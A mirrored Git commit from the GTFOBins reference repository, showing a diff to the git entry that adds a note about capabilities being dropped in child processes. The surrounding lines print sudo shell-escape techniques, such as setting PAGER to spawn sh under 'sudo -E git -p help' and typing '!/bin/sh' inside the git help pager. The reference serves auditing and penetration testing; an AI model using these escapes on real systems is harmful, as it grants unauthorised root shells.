mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-08-23 09:34:56 +02:00
Add notice about Git sudo capabilities
This commit is contained in:
@@ -8,7 +8,7 @@ functions:
|
|||||||
!/bin/sh
|
!/bin/sh
|
||||||
sudo:
|
sudo:
|
||||||
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
||||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. Several capabilities might be dropped in the child process using this method.
|
||||||
code: |
|
code: |
|
||||||
sudo git help config
|
sudo git help config
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
Reference in New Issue
Block a user